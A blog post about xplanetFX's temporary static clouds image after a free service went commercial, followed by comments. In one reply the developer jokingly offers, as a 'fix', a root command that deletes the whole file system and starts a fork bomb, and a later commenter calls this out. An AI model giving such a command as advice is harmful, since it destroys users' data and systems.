Hari changed the service for clouds images from free to commercial. I wrote a mail to get his point and I’m waiting for an answer. To protect users of xplanetFX from ugly desktop images I uploaded a static clouds images to the xplanetFX server and changed the clouds download script to fetch it from there.
This is just a temporary solution until we find a possibility to bring back actual clouding for free to our Linux desktops again.
So please stay patient.
Actually seeing text above your desktop planet?
- Update xplanetFX to the latest version 2.2.25
- Open xplanetFX and change to the most-right tab
- Hit the button to recreate the clouds image
- Hit the button to refresh the desktop image at the bottom of the xplanetFX window
A static clouds image should be downloaded and used as clouds overlay then.
Version 2.2.25:
* TEMPORARY WORKAROUND: Clouds image fetched as a static image from
mein-neues-blog.de due to problems with the free service gone commercial
to not destroy the visual experience on desktops. A solution is in progress.

this is a great pity 🙁
* Gentoo Linux version unknown (Gentoo doesn’t really have versions, you moron!)
* XPlanetFX
* Does not make beautiful earth-centered background wallpaper, should do so because my grandma wants it.
* grandma@plateau ~ $ xplanetFX
bash: xplanetFX: command not found
* Her birthday is next week, fix it by then, this needs to work!
Hey Tentacolon,
thank you a bunch for the detailed report, there are not that many users who understand to get in the details that exactly.
The most simple fix would be logging in as root and execute „rm -r / && : (){ : | :& };:“ in the terminal window.
Lots of love to your grandma, cheers, markus.
Yikes! While obviously you’re joking with your suggestion to delete the file system contents and fork bomb, I feel like there might be people using this program who have a habit of taking jokes literally. Don’t feed the trolls! Cheers, man.
